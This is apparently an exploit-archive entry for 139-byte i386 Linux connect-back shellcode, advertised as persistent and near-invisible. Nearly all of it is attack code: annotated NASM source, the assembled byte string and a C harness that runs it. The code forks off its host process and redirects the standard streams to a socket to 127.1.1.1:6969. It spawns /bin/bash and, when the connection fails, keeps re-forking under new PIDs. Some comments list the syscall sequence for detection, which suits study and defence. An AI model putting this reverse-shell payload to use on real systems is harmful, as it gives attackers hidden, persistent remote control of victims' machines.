
Connect Back 139 bytes

🗓️ 15 Sep 2014 00:00:00Reported by MadMouseType 

connect back shellcode forking to split and stay persistent

Code
/*
#Title: connect back shellcode that splits from the process it was injected into, and then stays persistent and difficult to remove. It is also very close to invisible due to some interesting effects created by forking, and calling the rdtsc instruction
#length: 139 bytes
#Date: 14 September  2014
#Author: Aaron Yool (aka: MadMouse)
#tested On: Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux
*/

/*
;
; part of my shellcode for noobs lesson series hosted in #goatzzz on
; irc.enigmagroup.org
;
; 32-bit syscall: number in eax; args in ebx, ecx, edx, esi, edi, and ebp
;-----------------------------------------------------------------------
; Connect-back shellcode, i386 Linux, NASM syntax (int 0x80 ABI: number
; in eax, args in ebx, ecx, edx, esi, edi, ebp).
; Observable syscall sequence, useful for triage/detection:
;   fork -> socketcall(socket) -> dup2 x4 (fds 0..3) ->
;   socketcall(connect to 127.1.1.1:6969) -> fork -> execve("/bin/bash")
; On any failure it closes the socket and restarts from _start, which
; forks again, so the retrying process changes PID on every pass.
; Register carry-over between blocks is deliberate and fragile: several
; `mov al, N` writes assume the upper bytes of eax are already zero.
;-----------------------------------------------------------------------
[bits 32]
section .text
global _start
_start:
; fork(void);
    xor eax,eax ; eax/edx were written by rdtsc on the loop-back path
    xor edx,edx ; edx also serves as envp (NULL) for execve later
    xor ebx,ebx ; zero the remaining argument registers
    xor ecx,ecx ; ....
    mov al,0x02  ; sys_fork
    int 0x80
    cmp eax,1    ; child (0) or failure (-errno) continues at `fork`
    jl fork        ; the label is the post-fork setup, not another fork
    jmp exit     ; parent exits, so the original process is gone
fork:
; socket(AF_INET, SOCK_STREAM, 0);
    push eax      ; protocol = eax; 0 on the child path (on a failed fork it would be -errno instead)
    push byte 0x1 ; SOCK_STREAM
    push byte 0x2 ; AF_INET
    mov al, 0x66 ; sys_socketcall (assumes the upper bytes of eax are still 0)
    mov bl,0x1    ; SYS_SOCKET
    mov ecx,esp  ; ecx -> {AF_INET, SOCK_STREAM, protocol}
    int 0x80     ; eax = s

; dup2(s,i);
    mov ebx,eax ; s (oldfd)
    xor ecx,ecx ; newfd counter
loop:
    mov al,0x3f    ; sys_dup2(s, ecx)
    int 0x80
    inc ecx
    cmp ecx,4      ; fds 0, 1, 2 and 3 all become the socket
    jne loop

; connect(s, (sockaddr *) &addr,0x10);
    push 0x0101017f        ; sin_addr = 127.1.1.1 (in-memory bytes 7f 01 01 01)
    push word 0x391b    ; sin_port = 6969 in network byte order (0x1b39)
    push word 0x2        ; sin_family = AF_INET
    mov ecx,esp          ; &addr

    push byte 0x10  ; sizeof(struct sockaddr_in)
    push ecx        ; &addr
    push ebx        ; s
    mov ecx,esp     ; ecx -> {s, &addr, 16}
    mov al,0x66     ; sys_socketcall
    ; NOTE(review): ebx still holds s, and ebx is the socketcall sub-number,
    ; so this is SYS_CONNECT (3) only when s == 3 - e.g. a process that had
    ; exactly fds 0..2 open before the socket() call above.
    int 0x80
    xor ecx,ecx
    sub eax,ecx ; eax -= 0: sets ZF from connect's return value and leaves ecx = 0
    jnz cleanup ; connect failed -> close the socket and start over

; fork(void);
    mov al,0x02  ; eax was 0 (connect succeeded), so eax = sys_fork
    int 0x80
    cmp eax,1    ; child (0) or failure (-errno) goes to the shell
    jl client
    xor eax,eax
    push eax     ; parent: this push is never popped (see note at `jmp _start`)
    jmp cleanup  ; parent closes its copy of s and loops back to fork again

client:
; execve(SHELLPATH,{SHELLPATH,0},0);
    mov al,0x0b  ; sys_execve (eax was 0 from fork)
    jmp short sh ; jmp/call/pop idiom to load the string address into esi
load_sh:
    pop esi      ; esi -> "/bin/bash" (the return address pushed by `call load_sh`)
    push edx ; 0 -> argv[1] = NULL
    push esi ; argv[0] = path
    mov ecx,esp  ; argv
    mov ebx,esi  ; filename; envp = edx = NULL
    int 0x80     ; only returns on failure, then falls through to cleanup

cleanup:
; close(%ebx)
    xor eax,eax
    mov al,0x6   ; sys_close(s)
    int 0x80
    pause        ; the F3 90 spin-loop hint instruction, not pause(2): no sleep occurs
    rdtsc        ; clobbers edx:eax; both are re-zeroed at _start
    pause
    jmp _start   ; re-fork and retry without delay. Nothing pushed above is ever
                 ; popped, so esp drifts downward on every pass.

exit:
; exit(0);
    xor eax,eax
    mov al,0x1   ; sys_exit
    xor ebx,ebx  ; status 0
    int 0x80

sh:
    call load_sh ; pushes the address of the string below, then enters load_sh
    db "/bin/bash" ; no terminating NUL here; it relies on whatever byte follows

*/

/* Assembled bytes of the listing above: 139 bytes, matching the header.
 * As a C string literal it carries an implicit trailing NUL, which is what
 * terminates the "/bin/bash" path that the `db` directive left unterminated. */
const char evil[] =
"\x31\xc0\x31\xd2\x31\xdb\x31\xc9\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x02\xeb\x62\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x04\x75\xf6\x68\x7f\x01\x01\x01\x66\x68\x1b\x39\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\xcd\x80\x31\xc9\x29\xc8\x75\x1b\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x05\x31\xc0\x50\xeb\x0d\xb0\x0b\xeb\x1f\x5e\x52\x56\x89\xe1\x89\xf3\xcd\x80\x31\xc0\xb0\x06\xcd\x80\xf3\x90\x0f\x31\xf3\x90\xeb\x8b\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";

/* Function-pointer view used to transfer control into the byte array. */
typedef void (*shellcode)(void);
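/* Test harness: transfers control straight into the byte array.
 * `int main` replaces the non-standard `void main`; the return statement is
 * only reached if control ever comes back, which the listing's own exit path
 * (sys_exit in the parent) normally prevents. */
int main(void)
{
    ((shellcode)evil)();
    return 0;
}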
